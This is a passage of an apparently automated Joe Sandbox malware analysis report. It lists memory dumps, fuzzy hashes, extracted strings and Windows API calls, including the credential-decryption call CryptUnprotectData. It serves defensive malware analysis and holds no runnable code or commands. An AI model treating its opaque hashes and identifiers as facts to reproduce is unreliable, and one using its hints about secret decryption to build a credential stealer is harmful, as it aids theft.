                            • wsprintfA.USER32 ref: 000E7C47
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID:
                            • API String ID: 3317088062-0
                            • Opcode ID: 3036e37488de551edd2664bdad74dde4ac534b67bc4f031f8aaa1f90c423649f
                            • Instruction ID: 3beb57bd2fc6371a660432b76465737dac977ed248498ca0211f981b57bfb428
                            • Opcode Fuzzy Hash: 3036e37488de551edd2664bdad74dde4ac534b67bc4f031f8aaa1f90c423649f
                            • Instruction Fuzzy Hash: 8711CEB1A09218EFEB20CB54DC49FA9B77CFB41710F10079AF609A32D0D7741A408F50
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Q8:$g+v$Y/
                            • API String ID: 0-2071340323
                            • Opcode ID: 3181ce2069b9b4f1762fff348e41699d01700c9eb8103e38e16441ada95fc600
                            • Instruction ID: 20b0793684106cbfd6ff3f4d4dc4e4cc4cc348c44bcf3631fa58ebeeb700c10e
                            • Opcode Fuzzy Hash: 3181ce2069b9b4f1762fff348e41699d01700c9eb8103e38e16441ada95fc600
                            • Instruction Fuzzy Hash: 73B2D3F3A0C2149FE3046F29EC8567AFBE9EF94720F16492DEAC483744EA3558418797
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: a{w$f/nB$s*o
                            • API String ID: 0-1288465101
                            • Opcode ID: 2f57b7add4650b673a7788dac80a44a3ddb2bc656e8dc1b92ca304ae6f40e0d5
                            • Instruction ID: 0db93313e8ec5bd2b177a218163795a1f9e427532421ab583154dd561826cddb
                            • Opcode Fuzzy Hash: 2f57b7add4650b673a7788dac80a44a3ddb2bc656e8dc1b92ca304ae6f40e0d5
                            • Instruction Fuzzy Hash: 42B219F390C204AFE304AE2DEC8567ABBE9EF94720F1A852DE6C4C7744E63558058796
                            APIs
                            • CoCreateInstance.COMBASE(000EE120,00000000,00000001,000EE110,00000000), ref: 000E39A8
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 000E3A00
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWide
                            • String ID:
                            • API String ID: 123533781-0
                            • Opcode ID: 21de629642847d0668e39cb6b4578eaad74019bbc8bfe05bc1e94321e6ac8f7b
                            • Instruction ID: fa11759cdbc8fb4efec8339255f0edffec800c812b5d479263f6b0c698f6b1ff
                            • Opcode Fuzzy Hash: 21de629642847d0668e39cb6b4578eaad74019bbc8bfe05bc1e94321e6ac8f7b
                            • Instruction Fuzzy Hash: 8641D570A40A289FDB24DB59CC95B9BB7B5AB48702F4041D8E608EB290D7B16EC5CF50
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 000DA2D4
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 000DA2F3
                            • LocalFree.KERNEL32(?), ref: 000DA323
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: b564bea4eb6dcb7ed30f3187093d08afaee67ba53ea0b4dbd0fa2fc06ef818c8
                            • Instruction ID: fe96f65f09c86d80b2d32b8e0a1debba544082c43436d17be4106c5c46d80f4c
                            • Opcode Fuzzy Hash: b564bea4eb6dcb7ed30f3187093d08afaee67ba53ea0b4dbd0fa2fc06ef818c8
                            • Instruction Fuzzy Hash: 7D11E8B8A00209DFCB05DFA4D884AAEB7B9FB89300F108559FD1597390D770AE51CBA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ?$__ZN
                            • API String ID: 0-1427190319
                            • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                            • Instruction ID: ddb4deba79631a27c551f771ad0f581281c58a6a87b4bc05201807783f781b4b
                            • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                            • Instruction Fuzzy Hash: BA720472908B509BD718CF18C89077ABBE3BFD5310F5A8A1DF8A55B2A2D370DC459B81
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: xn--
                            • API String ID: 0-2826155999
                            • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                            • Instruction ID: 931d54b740eaceabb59b2fa80ebb3a63fd0eccfe59aa9cdb0f0800ac954df74c
                            • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                            • Instruction Fuzzy Hash: A3A201B1C042788BEF18CB68E8A03EDB7B1EF55300F1842AAD5567B2C1E7755EA5CB50
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __aulldiv
                            • String ID:
                            • API String ID: 3732870572-0
                            • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                            • Instruction ID: c26d602674166be3cc07f24f43fe1333605e4ce1c97c0f14b8567995f9aa594b
                            • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                            • Instruction Fuzzy Hash: E6E1F1316083619FC724CF28D8907AEB7E2EFC9300F554A2DE5D99B291D7319C65CB86
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __aulldiv
                            • String ID:
                            • API String ID: 3732870572-0
                            • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                            • Instruction ID: f12ee8dff6676d1200fb7678323478c298c3e452f039f15c2ea6b289ac94bc98
                            • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                            • Instruction Fuzzy Hash: 96E1D531A083259FCB24CF18D8917AEB7E6EFC9310F15892DE88A9B251D730EC55CB46
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: UNC\
                            • API String ID: 0-505053535
                            • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                            • Instruction ID: 9225b83d2800932f8471e85bb7132dd3777f3929e8d76c28039a310cf19392c5
                            • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                            • Instruction Fuzzy Hash: 0CE13BB1D043658EEF14CF19C8853BEBFF2AB85314F198169D4A8AB2D2D7358D46CB90
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: j(`{
                            • API String ID: 0-3786087472
                            • Opcode ID: 5d50d49d9ed7de064fa08fa406d36a042b87f56f414f06b3d826a54bee5dae56
                            • Instruction ID: 8af23592e40a4e6d34a0006379007fc31db570e0d1f6981b7be3ae52db57ede9
                            • Opcode Fuzzy Hash: 5d50d49d9ed7de064fa08fa406d36a042b87f56f414f06b3d826a54bee5dae56
                            • Instruction Fuzzy Hash: 0261C5B750DA00EFD3046E2C9D816BABBEDFB94760F355D2ED58286340ED316842D652
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: /MB~
                            • API String ID: 0-3567587163
                            • Opcode ID: f5406eccef4bde692062edbe372a44ec3e63953ca44d7c5385dda3c6c0b4c1e4
                            • Instruction ID: 9e64aa3e03e9885701b0a1cccc64063a7f91c54476ea26e875c93de2c0cdabd3
                            • Opcode Fuzzy Hash: f5406eccef4bde692062edbe372a44ec3e63953ca44d7c5385dda3c6c0b4c1e4
                            • Instruction Fuzzy Hash: 1A5136F3E082085FF3146929DC9877AB7DADBC4720F17463DEA88D3B80E9795C054292
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Mf
                            • API String ID: 0-2487046005
                            • Opcode ID: 1c43fea2ae84b970dae0b64924137b5ec657003a170fe69fb88d785b9a76ac55
                            • Instruction ID: 582199c11c38b71ae496f9691f41727afea54242466f59c785727a7b453367fc
                            • Opcode Fuzzy Hash: 1c43fea2ae84b970dae0b64924137b5ec657003a170fe69fb88d785b9a76ac55
                            • Instruction Fuzzy Hash: BB413CB3509210ABD300EE3ADD4465BBBEAFFD4760F26C62DE5C843758EA354845C782
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                            • Instruction ID: 89be538372b96982346eefa41bd0605744724e5726dd87e40c43d1f438d84a4f
                            • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                            • Instruction Fuzzy Hash: 998201B5900F458FD365CF29C880BA2B7F1BF5A300F548A2ED9EA8BA51DB30B545DB50
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                            • Instruction ID: 70e49f5cd0e7f272426c258f4069cbddd42585bed6f4671bc3bc08d9674a145e
                            • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                            • Instruction Fuzzy Hash: 55B19072A083515BD308CF25C8917ABF7E2EFC8710F1AC93EF89997291D774D9419A82
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
